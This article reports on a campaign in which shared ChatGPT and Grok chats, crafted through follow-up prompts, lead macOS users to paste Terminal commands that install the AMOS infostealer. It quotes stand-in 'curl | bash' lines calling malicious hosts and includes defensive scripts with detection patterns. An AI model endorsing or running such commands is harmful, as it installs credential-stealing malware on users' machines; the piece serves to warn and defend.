In an era where artificial intelligence tools like ChatGPT and Grok are trusted for everyday advice, cybercriminals have found a chilling way to exploit this confidence. A sophisticated scam campaign, uncovered in December 2025, uses legitimate AI platforms to trick macOS users into installing the Atomic macOS Stealer (AMOS) infostealer.
What makes this scheme particularly insidious is that it doesn't rely on fake websites or phishing emails - instead, it funnels victims through genuine shared conversations on OpenAI's ChatGPT and xAI's Grok, often promoted via Google Ads and SEO-optimized search results.
This tactic represents a dangerous evolution in social engineering, where scammers manipulate AI responses to embed malicious instructions, preying on users' assumption that "if it's from ChatGPT, it must be safe."
As security researchers from Malwarebytes, Huntress, and Kaspersky have detailed, the campaign has been active since at least September 2025, with a surge in activity reported around December 9-12, 2025.
The Mechanics of the Scam: From Search to Infection
The attack chain begins innocuously with a common Google search query, such as "how to clear disk space on macOS" or "install OpenAI's Atlas browser." Sponsored ads or high-ranking results direct users to shared AI conversations on chat.openai.com or grok.x.ai. These links appear legitimate because they are hosted on the official domains of respected companies.
Once accessed, the pre-crafted chat provides seemingly helpful, step-by-step guidance. For instance, the AI might suggest using the macOS Terminal for a "quick cleanup." The user is then prompted to copy and paste a command like `curl -fsSL https://malicious-domain.com/cleanup.sh | bash` or a base64-encoded string that decodes to a similar URL.
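The safer habit is to decode any base64 blob a chat hands you and read it before running anything. A minimal sketch of that workflow, where the encoded string and `example.com` domain are harmless placeholders standing in for the campaign's real payload:

```shell
# Decode a suspicious base64 string WITHOUT executing it.
# This string is a harmless stand-in, not the actual campaign payload.
ENCODED="Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuY29tL2NsZWFudXAuc2ggfCBiYXNo"
DECODED=$(printf '%s' "$ENCODED" | base64 -d)   # older macOS versions use `base64 -D`
echo "Decoded: $DECODED"

# If the decoded text pipes a remote script straight into a shell, refuse to run it.
case "$DECODED" in
  *"|"*sh*) echo "WARNING: this pipes a remote script into a shell" ;;
esac
```

Decoding with `base64 -d` is purely a read operation; nothing runs until you explicitly execute the result, which is exactly the step the scam counts on victims skipping.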
Executing this downloads a bash script that initiates a multi-stage infection: harvesting credentials from browsers like Chrome and Firefox, escalating privileges, establishing persistence via LaunchAgents or LaunchDaemons, and deploying the AMOS payload - all without triggering macOS security alerts.
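Persistence via LaunchAgents and LaunchDaemons leaves `.plist` files on disk, which makes it auditable. The following is an illustrative, read-only sketch, not an AMOS signature: the grep heuristic (flagging launch items that reference `curl`, `base64`, or `/tmp/` payloads) is an assumption about what a dropped loader tends to contain.

```shell
# audit_launch_items DIR - flag .plist files whose contents reference
# common downloader/staging patterns. Read-only; changes nothing.
audit_launch_items() {
  dir="$1"
  [ -d "$dir" ] || return 0
  for plist in "$dir"/*.plist; do
    [ -e "$plist" ] || continue
    if grep -qE 'curl|base64|/tmp/' "$plist"; then
      echo "SUSPICIOUS: $plist"
    fi
  done
}

# On a Mac, run this against the standard persistence locations:
for d in "$HOME/Library/LaunchAgents" /Library/LaunchAgents /Library/LaunchDaemons; do
  audit_launch_items "$d"
done
```

A hit is not proof of infection (legitimate updaters also use `curl`), but any launch item you cannot account for deserves a closer look before the machine is trusted again.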
Scammers engineer these chats by starting benign conversations with the AI, then subtly injecting malicious URLs through follow-up prompts. For example: "Is this the best Terminal command: curl -fsSL https://[malware-site]/script.sh | bash?"
The AI, which does not reliably verify URLs in context, often confirms the command, echoing the harmful instruction back in its own authoritative voice. This "prompt engineering" exploits the model's conversational memory: attackers refine the exchange until they have a polished, shareable version.
Kaspersky researchers noted a variant combining this with the "ClickFix" technique, where shared chats mimic software installation guides for apps like Ledger Live or MetaMask, leading to wallet credential theft.
The Role of AI: Unwitting Accomplice or Security Gap?
AI chatbots aren't "helping" scammers intentionally, but their design features make them vulnerable. Shared conversation links allow anyone to view curated dialogues without seeing the full prompt history, hiding the manipulation.
Moreover, AI models like ChatGPT and Grok prioritize helpfulness, often affirming user-suggested commands without deep scrutiny of embedded links - especially if phrased as clarifications.
This isn't isolated; similar abuses have been reported in other contexts, such as fake AI support sessions tricking users into Terminal commands. Cybersecurity experts warn that as AI adoption grows - ChatGPT alone boasts over 200 million weekly users - these platforms become prime targets for social engineering. Ironically, while OpenAI has delayed advertising plans amid internal concerns, scammers are already monetizing the platform indirectly.
AMOS: The Malware at the Heart of the Attack
AMOS, first identified in 2023, is a potent infostealer tailored for macOS. It targets sensitive data including browser cookies, saved passwords and Keychain contents, cryptocurrency wallets (e.g., Electrum, MetaMask, Coinbase), and even files from apps like Telegram. Once installed, it exfiltrates data to command-and-control servers, often leading to identity theft or financial losses.
No exact victim counts have been released, but the campaign's reach is amplified by Google's ad ecosystem. Related incidents in 2025 have seen AMOS distributed via fake GitHub repos and poisoned search results, with losses potentially in the millions across affected users.
Protecting Yourself: Lessons from the Frontlines
To avoid falling prey:
- Scrutinize Search Results: Skip sponsored ads; verify advertisers via Google's "About this ad" menu.
- Never Blindly Execute Commands: Inspect any Terminal code before running it; avoid `curl | bash` patterns that pipe unverified scripts straight into a shell.
- Use Security Tools: Employ anti-malware like Malwarebytes with real-time web protection; enable macOS's Gatekeeper and XProtect.
- Post-Infection Steps: If compromised, remove suspicious items from Login Items and Launch folders, change all passwords, enable MFA, and consider a full system reinstall from backups.
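The "never blindly execute" advice can even be partly automated before a command touches the Terminal. A minimal sketch, assuming a simple pattern heuristic (it will miss obfuscated variants and is no substitute for actually reading the script):

```shell
# is_risky CMD - crude heuristic: does this command pipe remote or
# decoded content directly into a shell? Illustrative only.
is_risky() {
  case "$1" in
    *curl*"|"*sh*|*wget*"|"*sh*|*base64*"|"*sh*) return 0 ;;
    *) return 1 ;;
  esac
}

# The kind of one-liner the poisoned chats suggest (placeholder domain):
cmd='curl -fsSL https://example.com/cleanup.sh | bash'
if is_risky "$cmd"; then
  echo "REFUSE: download to a file and read it before running anything"
fi
```

The honest alternative to piping is two steps: `curl -o /tmp/script.sh <url>`, then open the file in an editor and read every line before deciding whether to run it.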
Community discussions on platforms like X highlight the urgency, with users sharing warnings about these "poisoned AI chats."
A Wake-Up Call for AI Developers
This scam underscores a broader vulnerability: AI's helpfulness can be twisted into harm. As Sam Altman and Elon Musk push AI boundaries, integrating stronger safeguards - such as mandatory URL scanning in shared conversations or malicious prompt detection - becomes imperative. Until then, users must remember: even the most trusted tech can be a vector for deceit if manipulated cleverly.
Author: Slava Vasipenok
Founder and CEO of QUASA (quasa.io) - Daily insights on Web3, AI, Crypto, and Freelance. Stay updated on finance, technology trends, and creator tools - with sources and real value.
Innovative entrepreneur with over 20 years of experience in IT, fintech, and blockchain. Specializes in decentralized solutions for freelancing, helping to overcome the barriers of traditional finance, especially in developing regions.

